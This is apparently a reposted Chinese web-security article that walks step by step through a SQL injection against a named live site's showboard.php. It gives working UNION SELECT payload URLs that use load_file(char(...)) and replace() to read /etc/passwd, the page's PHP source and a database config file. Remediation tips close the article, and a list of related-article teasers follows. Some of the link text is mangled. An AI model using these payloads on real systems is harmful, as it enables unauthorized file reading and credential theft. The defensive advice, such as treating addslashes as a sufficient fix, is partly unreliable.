php网站系统入侵的过程 php网站常见漏洞出现的原因
听承诺说CASI出2.0了,而且承诺也给了一个有漏洞的地址,正好没事就测试了一下,最近非常郁闷,学不下去,正好今天承诺勾起了我学习php的美好时光,看看自己还能不能搞这样的站吧.
过程:
承诺给的地址是http://www.gametea.com//showboard.php?id=282
很标准的php注入形式,我们也按照标准的php注入方法来进行注入,首先再后面加一个',
http://www.gametea.com/showboard.php?id=282'
如图1
他告诉我们2个方面的信息,第一是magic_quotes_gpc = off
第二个就是web路径/home/newgt/showboard.php
再提交语句以前我们还是先来说明一下php注入的原理和一个小例子,php注入就是利用变量过滤不足造成的
看看下面两句SQL语句:
①SELECT * FROM article WHERE articleid='$id'
②SELECT * FROM article WHERE articleid=$id
两种写法在各种程序中都很普遍,但安全性是不同的,第一句由于把变量$id放在一对单引号中,这样使得我们所提交的变量都变成了字符串,即使包含了正确的SQL语句,也不会正常执行,而第二句不同,由于没有把变量放进单引号中,那我们所提交的一切,只要包含空格,那空格后的变量都会作为SQL语句执行,我们针对两个句子分别提交两个成功注入的畸形语句,来看看不同之处。
① 指定变量$id为:
1' and 1=2 union select * from user where userid=1/*
此时整个SQL语句变为:
SELECT * FROM article WHERE articleid='1' and 1=2 union select * from user where userid=1/*'
②指定变量$id为:
1 and 1=2 union select * from user where userid=1
此时整个SQL语句变为:
SELECT * FROM article WHERE articleid=1 and 1=2 union select * from user where userid=1
看出来了吗?由于第一句有单引号,我们必须先闭合前面的单引号,这样才能使后面的语句作为SQL执行,并要注释掉后面原SQL语句中的后面的单引号,这样才可以成功注入,如果php.ini中magic_quotes_gpc设置为on或者变量前使用了addslashes()函数,我们的攻击就会化为乌有,但第二句没有用引号包含变量,那我们也不用考虑去闭合、注释,直接提交就OK了。
好了现在我们就要按照angel的方法来提交语句了http://www.gametea.com/showboard.php?id=282 and 1=2 union select 50,9,8,7,6,5,4,3,2,1
如图2
再这里我们可以得知7和9这两个地方是文本的,也就是说可以显示我们想要的文件的内容,下面我们就是要读取服务器上的文件了从web路径上看这台机器应该是UNIX的,那么我们的目标就是拿到/etc/passwd这个文件了
我们知道,在SQL语句中,可以使用各种MySQL内置的函数,经常使用的就是DATABASE()、USER()、SYSTEM_USER()、SESSION_USER()、CURRENT_USER()这些函数来获取一些系统的信息,还有一个应用得比较多的函数,就是load_file(),该函数的作用是读入文件,并将文件内容作为一个字符串返回。
看到这里,应该可以想到我们可以做什么了,就是读取一些机密文件,但是也是有条件限制的:
欲读取文件必须在服务器上
必须指定文件完整的路径
必须有权限读取并且文件必须完全可读
欲读取文件必须小于 max_allowed_packet
如果该文件不存在,或因为上面的任一原因而不能被读出,函数返回空。比较难满足的就是权限,在windows下,如果NTFS设置得当,是不能读取相关的文件的,当遇到只有administrators才能访问的文件,users就别想load_file出来。
在实际的注入中,我们有两个难点需要解决:
绝对物理路径
构造有效的畸形语句
在很多PHP程序中,当提交一个错误的Query,如果display_errors = on,程序就会暴露WEB目录的绝对路径,只要知道路径,那么对于一个可以注入的PHP程序来说,整个服务器的安全将受到严重的威胁。构造语句已经是小意思了。
我们这里用的load_file(char())这个函数我们需要把/etc/passwd转化成16进制的我们请出asc2chr这个工具来帮我们完成转化工作
如图三
我们很轻松的就得到了/etc/passwd的16进制格式
下面就是构建语句了_file(char(47,101,116,99,47,112,97,115,115,119,100)),6,5,4,3,2,1">http://www.gametea.com/showboard.php?id=282 and 1=2 union select 50,9,8,load_file(char(47,101,116,99,47,112,97,115,115,119,100)),6,5,4,3,2,1
很轻松就得到了/etc/passwd的文件,大家看一下图片,
如图4
下面我们就要想办法来读取config的配置文件了,因为前面我们得到了web的路径所以读取就很轻松了
构建语句_file(char(47,104,111,109,101,47,110,101,119,103,116,47,115,104,111,119,98,111,97,114,100,46,112,104,112)),6,5,4,3,2,1">http://www.gametea.com//showboard.php?id=282 and 1=2 union select 50,9,8,load_file(char(47,104,111,109,101,47,110,101,119,103,116,47,115,104,111,119,98,111,97,114,100,46,112,104,112)),6,5,4,3,2,1
如图五
可是和我们想的不一样,并没有得到php源代码,原来php的代码再服务器端执行了,这个时候我们可以用angel的办法利用into outfile来把要读取的文件备份到服务器上,可是我没有这样做,因为我不想局限于别人的思路我认为mysql一定有强大的函数能帮助我们的,记得以前学习php的时候学字符串函数的时候学到了这样一个函数就是replace()他的作用就是把指定的字符串换成我们想要的字符串,我觉得一定能够利用,
附:replace()函数原形
REPLACE(str,from_str,to_str)返回字符串str,其字符串from-str的所有出现有字符串to-str代替
mysql>SELECT REPLACE('www.mysql.com','w','Ww');
->'WwWwWw.mysql.com'
到这里我就想了php源代码的固定形式是这样的,
那么我们如果打破规则,把 中的
_file(char(47,104,111,109,101,47,110,101,119,103,116,47,115,104,111,119,98,111,97,114,100,46,112,104,112)),char(60),char(32)),6,5,4,3,2,1">http://www.gametea.com//showboard.php?id=282 and 1=2 union select 50,9,8,replace(load_file(char(47,104,111,109,101,47,110,101,119,103,116,47,115,104,111,119,98,111,97,114,100,46,112,104,112)),char(60),char(32)),6,5,4,3,2,1
char(60) 是
他的意思就是把换成空格,我们已经成功了,大家看图,
如图6
好了到这里我们的目的就是读取config的文件了他的config文件是/home/newgt/localdata.php,
够建语句如下
_file(char(47,104,111,109,101,47,110,101,119,103,116,47,108,111,99,97,108,100,97,116,97,46,112,104,112)),char(60),char(32)),6,5,4,3,2,1">http://www.gametea.com/showboard.php?id=282 and 1=2 union select 50,9,8,replace(load_file(char(47,104,111,109,101,47,110,101,119,103,116,47,108,111,99,97,108,100,97,116,97,46,112,104,112)),char(60),char(32)),6,5,4,3,2,1
如图7我们就已经得到了config的文件了,
如图7
到这里我们的思路就应该清楚了,我就不在往下做了,如果大家感兴趣的话可以参考我以前的文章来继续渗透,这里我们已经能够清楚的看到一个小小的注入漏洞就能引出这么大的漏洞,希望国内的人重视起来,下面是解决办法防范可以从两个方面着手,一个就是服务器,二个就是代码本身,介绍服务器配置的文章很多了,无非就是把magic_quotes_gpc设置为On,display_errors设置为Off,这里也就不在多说,既然本文接触都是程序的问题,我们还是从程序本身寻找原因。
如果说php比asp易用,安全,从内置的函数就可以体现出来。如果是整形的变量,只需使用一个intval()函数即可解决问题,在执行查询之前,我们先处理一下变量,如下面的例子就是很安全的了:
$id = intval($id);
mysql_query("SELECT * FROM article WHERE articleid='$id'");
或者这样写:
mysql_query("SELECT * FROM article WHERE articleid=".intval($id)."")
不管如何构造,最终还是会先转换为整形猜放入数据库的。很多大型程序都是这样写,非常简洁。
字符串形的变量也可以用addslashes()整个内置函数了,这个函数的作用和magic_quotes_gpc一样,使用后,所有的 ' (单引号), " (双引号), (反斜线) and 空字符会自动转为含有反斜线的溢出字符。而且新版本的php,就算magic_quotes_gpc打开了,再使用addslashes()函数,也不会有冲突,可以放心使用。例子如下:
$username = addslashes($username);
mysql_query("SELECT * FROM members WHERE userid='$username'");
或者这样写:
mysql_query("SELECT * FROM members WHERE userid=".addslashes($username)."")
使用addslashes()函数还可以避免引号配对错误的情况出现。而刚才的前面搜索引擎的修补方法就是直接把"_"、"%"转换为"_""%"就可以了,当然也不要忘记使用addslashes()函数。具体代码如下:
$keywords = addslashes($keywords);
$keywords = str_replace("_","_",$keywords);
$keywords = str_replace("%","%",$keywords);
好了,这篇文章就写到这里
315晚会曝光微信红包诈骗,同时提醒要提防wifi背后黑手
在昨天的 315 晚会中,央视通过调查、暗访为消费者揭露了有一批企业、服务坑害消费者的行为,而在这次的名单中,科技企业占据了约一半的席位。随着手机越来越成为人们日常生活中不可或缺的沟通工具,尤其带来的
详情2018-01-19 16:58:18责编:llp 来源:驱动管家系统的密码破解有哪些方法?如何破解系统密码?
一、ERD2003利用ERD2003强行修改系统管理员密码的方法简单、易于操作,且对2000 xp 2003系统均有效。下面就具体介绍一下这个软件的用法。1 下载ERD2003的iso,刻录成可启动的CD,注意别搞错了,直接刻录镜像最好
详情2018-01-15 08:59:12责编:llp 来源:驱动管家大蜘蛛杀毒软件怎么卸载?大蜘蛛杀毒软件的卸载方法
Dr Web大蜘蛛反病毒2008专业版,在软件程序设计的又如何呢,我们今天来检查一下它的卸载过程。
详情2018-01-04 10:30:53责编:llp 来源:驱动管家如何破解电脑开机密码?简单一招就可以破解电脑开机密码
碰到电脑就像玩一会,但是,电脑开机需要密码怎么办?现在教你小小一招巧解任何电脑的开机密码。无需任何工具,无需放电。任何电脑当开机需要密码时,只需将机箱打开,把里面的声卡或其它任何一个零件拔下来,然
详情2018-01-14 18:07:50责编:llp 来源:驱动管家zol中关村在线博客子站有漏洞?修复的方案是什么?
分析一下中关村的博客的漏洞
详情2018-01-22 14:37:53责编:llp 来源:驱动管家利用windows自带功能给文件夹加密的方法是什么?
每个人都有一些不希望别人看到的东西,例如学习计划、情书等等,大家都喜欢把它们放在一个文件夹里,虽然可以采用某些工具软件给文件夹加密,但那样太麻烦了,有没有什么简单的方法可以为自己的文件夹设定一个密
详情2018-01-07 14:44:43责编:llp 来源:驱动管家mcafee防病毒软件怎么保护网站服务器?安全的web目录怎么设置?
本文主要拿ASP文件做演示,大家可以修改E: wwwroot** asp为我们所希望限制的文件格式
详情2018-01-18 19:33:52责编:llp 来源:驱动管家畅无线应用破解中国移动wifi,提供免费无线上网服务
近日,一款名为“畅无线”的应用蹿红网络,原因在于,它利用中国移动的WiFi管理漏洞,为使用者提供免费的无线上网服务。该应用的开发商为上海云联计算机系统有限公司(以下简称云联),公司相关负责人向 记者表
详情2018-01-25 15:29:50责编:llp 来源:驱动管家python爬虫问题 python爬虫怎么处理动态网页?
在爬虫开发中,大家可以很轻易地bypass所谓的UA限制,甚至用scrapy框架轻易实现按照深度进行爬行。但是实际上,这些并不够。关于爬虫的基础知识比如数据处理与数据存储多线程之类的。请大家移步FB:该系列文章都
详情2018-01-15 20:08:13责编:llp 来源:驱动管家你知道如何提高网络域名的安全指数吗?网络域名安全指数提高n倍怎么做?
如何保证自己的账户的安全,做到下面这七点,域名安全指数就会提高N倍,快来看看吧。第一、账户注册信息的完整性我们在注册账户的时候,信息肯定必须完整的,如果你乱写资料,根据ICANN的规定是有权被ICANN的政策
详情2018-01-24 09:14:29责编:llp 来源:驱动管家
- 迅雷下载可以和百度浏览器关联吗?迅雷下载怎么关联浏览器?
- 百度手机地图离线包下载后导航还能用吗?百度手机地图导航使用方法
- 一台电脑怎么连接到两个显示器?
- 手机连接电脑只显示充电的问题有什么办法解决
- 电脑如果没有u盘启动项可以用存储设备来解决
- chm文件怎么打开?win7打开chm文件的方法
- 手机刷机是什么意思 手机怎么刷机?
- 魅族mx5的相关配置是什么样的?魅族mx5什么时候上市?
- 怎样才能让qq宠物不再登录?qq宠物怎么关闭?
- 电脑关机很慢是怎么回事?电脑关机关不了怎么解决?
- filezilla怎么用?filezilla server的安装和配置
- 什么是binder机制?android的一套漏洞挖掘框架
- 美图美拍为什么无法登陆?怎么解决美图美拍不能登陆的问题?
- 新浪微博客户端扫描二维码功能在哪儿?微博扫描二维码功能
- 无线充电ic公司哪家好?关于无线充电ic公司对比
- 什么是显存速度?关于显存速度的一些介绍
- 我的win8电脑突然发现桌面没有图标怎么办
- 无线鼠标接收器没反应是不是坏了?怎么解决
- 小米note2在哪里可以买?小米note2的购机攻略
- iphone5壁纸太普通太难看了,怎么更换?